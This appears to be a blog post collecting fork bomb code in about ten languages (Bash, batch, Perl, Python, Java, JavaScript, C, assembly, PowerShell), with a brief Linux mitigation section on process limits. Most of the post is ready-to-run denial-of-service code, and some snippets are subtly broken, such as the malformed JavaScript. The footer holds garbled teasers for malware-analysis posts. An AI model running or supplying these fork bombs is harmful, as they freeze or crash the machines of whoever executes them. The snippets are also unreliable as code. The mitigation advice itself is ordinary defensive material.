fork-bomb in several language implements

By -
anyone that has worked with Linux for any amount of time, the word fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros.

BASH
$ :(){ :|: & };:

.sh (Shell file)
#!/bin/bash
./$0|./$0&

.bat (Windows bat implements)
:TOP
start "" %0
goto TOP

~OR~
%0|%0
  #below is the same, but done in command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat

.pl (Perl implement)
#! /bin/perl
perl -e "fork while fork" &

.py (Python implement)
#! /bin/py
import os
while 1:
    os.fork()

(Java implement)
public class ForkBomb
{
 public static void main(String[] args)
  {
   while(true)
   {
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
  }
 }
}

.js (JavaScript implement)
function bomb() {
  setTimeout function() {
   for (;;) {
    bomb();
   }
  }, 0);
}

.c (C lang implement)
#include <unistd.h>
int main(void)
{
   while(1) {
    fork(); /* malloc can be used in order to increase the data usage */

   }
}

.asm (Assembly, IA-32)
section .text
   global _start
   
_start:
   mov eax,2 ;System call for forking
   int 0x80 ;Call kernel

   jmp _start

.ps (PowerShell implement)
while($true) { 
   Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
   Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}

Mitigation.
The fork bomb's mode of operation, (or MO), is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, use ulimit cmd with the below arguments: ulimit -u 30 This limits the affected user to a maximum of thirty owned processes. On PAM-enabled systems, the limit can be set in /etc/security/limits.conf
and on FreeBSD, root can set limits in
/etc/login.conf


   `r3v

Comments

Post a Comment

Popular posts from this blog

Decryption and Analysis of a "Shell" Backdoor

By -
Image
UPDATE [l] : shortly after finishing this post, I had decided to do a couple scans of the raw code. The results returned several Shell Trojan variants, and doing some permanent damage to windows systems. Reports available at ] VirusTotal ] and [ Malwr ]. Thanks to both services for the great results. It attempted network connx with the original url, not surprise from a webshell, IMO, only a bit strange that the likely 0wn/Op would keep such a trophy case in the wild like that? I mean really??. I would've expected an http request or few since nce that's who was hosting the assets but the requests were made to connect to "Hostthshellcode and then starts the endless streaming of the v1c's data and a continual stream of fresh code for the mal to swap out. This only confirmed the feeling I had about the src code. Multiple langs being used, illogical syntax and it's all just mixed together... if anyone can answer how this can support the back and forth exec using Perl,...
[[ more --»-»

Another Journey into a Malicious Abyss

By -
Image
This anonymous submission came to us a few days ago, only with the knowledge that the this payload tripped and was dropped by an Enterprise level A/V appliance. The 'submitter' got their hands on it and asked us to break it down. For this project, I elicited the help of F1re_W1re , a very good c0d3r as well as a very good brother. we have worked together many times in the past, with nothing but amazing results. When a second set of eyes or decoded iteration is needed, he is my go to. A hat tip to you, Sir. This project was a true collaboration of skillz to which I graciously thank him for his role as primary contributor. For reasons, I assumed the role of  Project Manager (PM), and Lead Consultant . This was solved by both of us doing out part and offering input and direction as needed. Often time it takes another set of eyes to see what's there, (or just not apparent). You will get what I mean later on. Let's get at it!! After acquiring the sample, it was clear th...
[[ more --»-»